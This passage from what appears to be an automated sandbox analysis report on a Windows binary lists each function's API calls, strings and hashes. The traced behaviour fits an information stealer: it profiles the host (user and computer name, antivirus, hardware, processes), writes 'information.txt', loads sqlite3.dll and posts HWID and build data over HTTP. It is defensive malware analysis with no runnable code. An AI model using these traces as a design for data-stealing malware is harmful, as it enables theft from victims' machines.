Part of subcall function 00D6278C: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D627A0
Part of subcall function 00D6278C: HeapAlloc.KERNEL32(00000000,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D627A7

Part of subcall function 00D63463: __EH_prolog3_catch_GS.LIBCMT ref: 00D6346A
Part of subcall function 00D63463: CoInitializeEx.OLE32(00000000,00000000,0000004C,00D65C36,Install Date: ,00D878F0,00000000,Windows: ,00D878E0,Work Dir: In memory,00D878C8), ref: 00D6347B
Part of subcall function 00D63463: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00D6348C
Part of subcall function 00D63463: CoCreateInstance.OLE32(00D83F70,00000000,00000001,00D83EA0,?), ref: 00D634A6
Part of subcall function 00D63463: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00D634DC
Part of subcall function 00D63463: VariantInit.OLEAUT32(?), ref: 00D63537

Part of subcall function 00D635F3: __EH_prolog3_catch.LIBCMT ref: 00D635FA
Part of subcall function 00D635F3: CoInitializeEx.OLE32(00000000,00000000,00000030,00D65CA4,?,AV: ,00D87904,Install Date: ,00D878F0,00000000,Windows: ,00D878E0,Work Dir: In memory,00D878C8), ref: 00D63609
Part of subcall function 00D635F3: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00D6361A
Part of subcall function 00D635F3: CoCreateInstance.OLE32(00D83F70,00000000,00000001,00D83EA0,?), ref: 00D63634
Part of subcall function 00D635F3: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00D6366A
Part of subcall function 00D635F3: VariantInit.OLEAUT32(?), ref: 00D636B9

Part of subcall function 00D628E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D51375), ref: 00D628ED
Part of subcall function 00D628E1: HeapAlloc.KERNEL32(00000000,?,?,?,00D51375), ref: 00D628F4
Part of subcall function 00D628E1: GetComputerNameA.KERNEL32(00000000,00D51375), ref: 00D62908

Part of subcall function 00D628AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D513A9), ref: 00D628BB
Part of subcall function 00D628AF: HeapAlloc.KERNEL32(00000000,?,?,?,00D513A9), ref: 00D628C2
Part of subcall function 00D628AF: GetUserNameA.ADVAPI32(00000000,00D513A9), ref: 00D628D6

Part of subcall function 00D631BF: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00D631D1
Part of subcall function 00D631BF: GetDeviceCaps.GDI32(00000000,00000008), ref: 00D631DC
Part of subcall function 00D631BF: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00D631E7
Part of subcall function 00D631BF: ReleaseDC.USER32(00000000,00000000), ref: 00D631F2
Part of subcall function 00D631BF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00D65DD5,?,Display Resolution: ,00D87934,00000000,User Name: ,00D87924,00000000,Computer Name: ,00D87910,AV: ,00D87904), ref: 00D631FE
Part of subcall function 00D631BF: HeapAlloc.KERNEL32(00000000,?,?,00D65DD5,?,Display Resolution: ,00D87934,00000000,User Name: ,00D87924,00000000,Computer Name: ,00D87910,AV: ,00D87904,Install Date: ), ref: 00D63205
Part of subcall function 00D631BF: wsprintfA.USER32 ref: 00D63217

Part of subcall function 00D62A37: GetKeyboardLayoutList.USER32(00000000,00000000,00D87812,?,?), ref: 00D62A68
Part of subcall function 00D62A37: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D62A76
Part of subcall function 00D62A37: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00D62A84
Part of subcall function 00D62A37: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00D62AB3
Part of subcall function 00D62A37: LocalFree.KERNEL32(00000000), ref: 00D62B5B

Part of subcall function 00D6298A: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00D629A5
Part of subcall function 00D6298A: HeapAlloc.KERNEL32(00000000), ref: 00D629AC
Part of subcall function 00D6298A: GetTimeZoneInformation.KERNEL32(?), ref: 00D629BB
Part of subcall function 00D6298A: wsprintfA.USER32 ref: 00D629D9

Part of subcall function 00D62BAD: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000,Local Time: ,00D8796C), ref: 00D62BC1
Part of subcall function 00D62BAD: HeapAlloc.KERNEL32(00000000,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000,Local Time: ,00D8796C,Keyboard Languages: ,00D87950), ref: 00D62BC8
Part of subcall function 00D62BAD: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00D878C8,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000,Local Time: ), ref: 00D62BE6
Part of subcall function 00D62BAD: RegQueryValueExA.KERNEL32(00D878C8,00000000,00000000,00000000,000000FF,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000), ref: 00D62C02
Part of subcall function 00D62BAD: RegCloseKey.ADVAPI32(00D878C8,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000,Local Time: ,00D8796C,Keyboard Languages: ,00D87950), ref: 00D62C0B

Part of subcall function 00D62C63: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00D62CD9
Part of subcall function 00D62C63: wsprintfA.USER32 ref: 00D62D37

Part of subcall function 00D62C16: GetSystemInfo.KERNEL32(?), ref: 00D62C30
Part of subcall function 00D62C16: wsprintfA.USER32 ref: 00D62C48

Part of subcall function 00D62D75: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00D87950,Display Resolution: ,00D87934,00000000,User Name: ,00D87924,00000000,Computer Name: ,00D87910,AV: ,00D87904,Install Date: ), ref: 00D62D8D
Part of subcall function 00D62D75: HeapAlloc.KERNEL32(00000000), ref: 00D62D94
Part of subcall function 00D62D75: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00D62DB0
Part of subcall function 00D62D75: wsprintfA.USER32 ref: 00D62DD6

Part of subcall function 00D63101: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00D87817,?,?), ref: 00D63130
Part of subcall function 00D63101: Process32First.KERNEL32(00000000,00000128), ref: 00D63140
Part of subcall function 00D63101: Process32Next.KERNEL32(00000000,00000128), ref: 00D6319E
Part of subcall function 00D63101: CloseHandle.KERNEL32(00000000), ref: 00D631A9

Part of subcall function 00D62E5F: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00D87816,00000000,?,?), ref: 00D62ECF
Part of subcall function 00D62E5F: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D62F0C
Part of subcall function 00D62E5F: wsprintfA.USER32 ref: 00D62F39
Part of subcall function 00D62E5F: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00D62F58
Part of subcall function 00D62E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00D62F8E
Part of subcall function 00D62E5F: lstrlenA.KERNEL32(?), ref: 00D62FA3

Part of subcall function 00D62E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00D87E28), ref: 00D63038
Part of subcall function 00D62E5F: RegCloseKey.ADVAPI32(?), ref: 00D630A2
Part of subcall function 00D62E5F: RegCloseKey.ADVAPI32(?), ref: 00D630CE

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00D87950,Display Resolution: ,00D87934,00000000,User Name: ,00D87924,00000000), ref: 00D662A0

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

Strings

information.txt, xrefs: 00D662B0
11.8, xrefs: 00D658FC
Date: , xrefs: 00D6595C
Cores: , xrefs: 00D65FCB
RAM: , xrefs: 00D6608D
HWID: , xrefs: 00D65A8B
[Software], xrefs: 00D661E0
Windows: , xrefs: 00D65BAD
GUID: , xrefs: 00D65A1E
MachineID: , xrefs: 00D659BD
Local Time: , xrefs: 00D65E88
Threads: , xrefs: 00D6602C
Computer Name: , xrefs: 00D65CEA
[Hardware], xrefs: 00D65F4A
Path: , xrefs: 00D65AF8
VideoCard: , xrefs: 00D660F4
Work Dir: In memory, xrefs: 00D65B6D
[Processes], xrefs: 00D66167
Display Resolution: , xrefs: 00D65DAC
User Name: , xrefs: 00D65D4B
Install Date: , xrefs: 00D65C0E
Version: , xrefs: 00D658DC
Processor: , xrefs: 00D65F6A
TimeZone: , xrefs: 00D65EE9
Keyboard Languages: , xrefs: 00D65E1B
AV: , xrefs: 00D65C7B

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: 11.8$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 478979899-3952884412
Opcode ID: 1b1793bcb66203c6064c6e1fa5dd5e471fbe813e252fc500779a31087ad16746
Instruction ID: 779bf9bc4ef591f003714eb3964cbf2223788d3fc13709f630ea4ee622f56181
Opcode Fuzzy Hash: 1b1793bcb66203c6064c6e1fa5dd5e471fbe813e252fc500779a31087ad16746
Instruction Fuzzy Hash: 6E524C32D4451AABCF00FBA5EC539EDB774EF09300F618561AA1077162DB21AF5E8BB4

Function 00D69E25 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00D69E66
GetProcAddress.KERNEL32 ref: 00D69E7D
GetProcAddress.KERNEL32 ref: 00D69E94
GetProcAddress.KERNEL32 ref: 00D69EAB
GetProcAddress.KERNEL32 ref: 00D69EC2
GetProcAddress.KERNEL32 ref: 00D69ED9
GetProcAddress.KERNEL32 ref: 00D69EF0
GetProcAddress.KERNEL32 ref: 00D69F07
GetProcAddress.KERNEL32 ref: 00D69F1E
GetProcAddress.KERNEL32 ref: 00D69F35
GetProcAddress.KERNEL32 ref: 00D69F4C
GetProcAddress.KERNEL32 ref: 00D69F63
GetProcAddress.KERNEL32 ref: 00D69F7A
GetProcAddress.KERNEL32 ref: 00D69F91
GetProcAddress.KERNEL32 ref: 00D69FA8
GetProcAddress.KERNEL32 ref: 00D69FBF
GetProcAddress.KERNEL32 ref: 00D69FD6
GetProcAddress.KERNEL32 ref: 00D69FED
GetProcAddress.KERNEL32 ref: 00D6A004
GetProcAddress.KERNEL32 ref: 00D6A01B
LoadLibraryA.KERNEL32(?,00D69CA1), ref: 00D6A02C
LoadLibraryA.KERNEL32(?,00D69CA1), ref: 00D6A03D
LoadLibraryA.KERNEL32(?,00D69CA1), ref: 00D6A04E
LoadLibraryA.KERNEL32(?,00D69CA1), ref: 00D6A05F
LoadLibraryA.KERNEL32(?,00D69CA1), ref: 00D6A070
GetProcAddress.KERNEL32(75070000,00D69CA1), ref: 00D6A08C
GetProcAddress.KERNEL32(75FD0000,00D69CA1), ref: 00D6A0A7
GetProcAddress.KERNEL32 ref: 00D6A0BE
GetProcAddress.KERNEL32(75A50000,00D69CA1), ref: 00D6A0D9
GetProcAddress.KERNEL32(74E50000,00D69CA1), ref: 00D6A0F4
GetProcAddress.KERNEL32(76E80000,00D69CA1), ref: 00D6A10F
GetProcAddress.KERNEL32 ref: 00D6A126

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: b505907dade273193663dd697c77b7e8e62e510cb3d813c015c68556338f2c80
Instruction ID: 76fcc2ee568a927625d3f13d565ad01dbf9bc78634ceb0ac59a244503ccfb93c
Opcode Fuzzy Hash: b505907dade273193663dd697c77b7e8e62e510cb3d813c015c68556338f2c80
Instruction Fuzzy Hash: 3071087580120EFFDB9A9F62FE499643BB6F7083453004027EA5192234E73659B8FF58

Function 00D68705 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D621A5: lstrlenA.KERNEL32(?,?,00D69098,00D877FE,00D87787,?,?,?,?,00D69D6E), ref: 00D621AB
Part of subcall function 00D621A5: lstrcpyA.KERNEL32(00000000,00000000,?,00D69098,00D877FE,00D87787,?,?,?,?,00D69D6E), ref: 00D621DD

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D68615: StrCmpCA.SHLWAPI(?,ERROR), ref: 00D68669
Part of subcall function 00D68615: lstrlenA.KERNEL32(?), ref: 00D68674
Part of subcall function 00D68615: StrStrA.SHLWAPI(00000000,?), ref: 00D68689
Part of subcall function 00D68615: lstrlenA.KERNEL32(?), ref: 00D68698
Part of subcall function 00D68615: lstrlenA.KERNEL32(00000000), ref: 00D686B1

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

StrCmpCA.SHLWAPI(?,ERROR), ref: 00D687EF
StrCmpCA.SHLWAPI(?,ERROR), ref: 00D68848
StrCmpCA.SHLWAPI(?,ERROR), ref: 00D688A8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00D68901
StrCmpCA.SHLWAPI(?,ERROR), ref: 00D68917
StrCmpCA.SHLWAPI(?,ERROR), ref: 00D6892D
StrCmpCA.SHLWAPI(?,ERROR), ref: 00D6893F
Sleep.KERNEL32(0000EA60), ref: 00D6894E

Strings

ERROR, xrefs: 00D68840
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 00D689FD
sqlite3.dll, xrefs: 00D689B7
ERROR, xrefs: 00D688A0
ERROR, xrefs: 00D68937
ERROR, xrefs: 00D688F9
sqlite3.dll, xrefs: 00D68A1C
sqlite3.dll, xrefs: 00D68A4D
ERROR, xrefs: 00D68925
ERROR, xrefs: 00D687E7
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 00D68A2E
sqlite3.dll, xrefs: 00D689EB
ERROR, xrefs: 00D6890F

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$sqlite3.dll$sqlite3.dll$sqlite3.dll$sqlite3.dll
API String ID: 2840494320-2908144267
Opcode ID: 89d923e7e16e9e606d3f3433b1c214db64eb96b34a751b2e67a68f9ad6fb40d5
Instruction ID: e20101635283cf2838d5317dde10323a2c753c80a128cdfb385eb1eb24688fba
Opcode Fuzzy Hash: 89d923e7e16e9e606d3f3433b1c214db64eb96b34a751b2e67a68f9ad6fb40d5
Instruction Fuzzy Hash: 4891D631E44218ABCF10BBA4EC43AACB774EF05751F604561BD44B7262DA35AF0E8BB1

Function 00D51656 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00D51686
wsprintfW.USER32 ref: 00D516AC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 00D516D6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 00D516EE
RtlAllocateHeap.NTDLL(00000000), ref: 00D516F5
_time64.MSVCRT ref: 00D516FE
srand.MSVCRT ref: 00D51705
rand.MSVCRT ref: 00D5170E
_memset.LIBCMT ref: 00D5171E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00D51736
_memset.LIBCMT ref: 00D51753
CloseHandle.KERNEL32(?), ref: 00D51761
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 00D5177D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00D51799
_memset.LIBCMT ref: 00D517AE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D517B8
RtlFreeHeap.NTDLL(00000000), ref: 00D517BF
CloseHandle.KERNEL32(?), ref: 00D517CB

Strings

%s%s, xrefs: 00D516A6
delays.tmp, xrefs: 00D51694

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: d1c784ec14fee183b0368864553d8fbd8268e78133a7c9e6ec32d6e95f4b050a
Instruction ID: b62edc45b4c740e91856b19235257d7c4b6854581976302a1df69ee799e82083
Opcode Fuzzy Hash: d1c784ec14fee183b0368864553d8fbd8268e78133a7c9e6ec32d6e95f4b050a
Instruction Fuzzy Hash: E341D1B9800318ABDB205B35EC4DFAB7B7DEF89721F000699B809E2151EB714999CF70

Function 00D54A56 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A10
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A16
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A1C
Part of subcall function 00D549DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00D54A2E
Part of subcall function 00D549DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00D54A36

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D54AF5
StrCmpCA.SHLWAPI(?), ref: 00D54B13
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D54CAB
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00D54CEF
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D54D1D

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

lstrlenA.KERNEL32(?,00D87A2B,",build_id,00D8898C,------,00D88980,",hwid,00D8896C,------), ref: 00D55016
lstrlenA.KERNEL32(?,?,00000000), ref: 00D55029
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00D55037
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D55094
InternetCloseHandle.WININET(00000000), ref: 00D5509F
InternetCloseHandle.WININET(?), ref: 00D550B6
InternetCloseHandle.WININET(?), ref: 00D550C2

Strings

------, xrefs: 00D54D23
------, xrefs: 00D54E83
hwid, xrefs: 00D54DD5
", xrefs: 00D54E01
", xrefs: 00D54F61
build_id, xrefs: 00D54F35
------, xrefs: 00D54B9D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$build_id$hwid
API String ID: 3006978581-3960666492
Opcode ID: e9e2fe4a2307657b7be3c5dd41022cd2933bc2dc1506cabf0147c6d793e64fce
Instruction ID: 387a296623636b8b087f171620c19de76e6c05cdb0708f354d5472a6e5263eed
Opcode Fuzzy Hash: e9e2fe4a2307657b7be3c5dd41022cd2933bc2dc1506cabf0147c6d793e64fce
Instruction Fuzzy Hash: 26028131D5512A9BCF20AB21DC52AEDB7B4FF09301F4540E1A94873266CA757F8A8FE0

Function 00D63463 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00D6346A
CoInitializeEx.OLE32(00000000,00000000,0000004C,00D65C36,Install Date: ,00D878F0,00000000,Windows: ,00D878E0,Work Dir: In memory,00D878C8), ref: 00D6347B
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00D6348C
CoCreateInstance.OLE32(00D83F70,00000000,00000001,00D83EA0,?), ref: 00D634A6
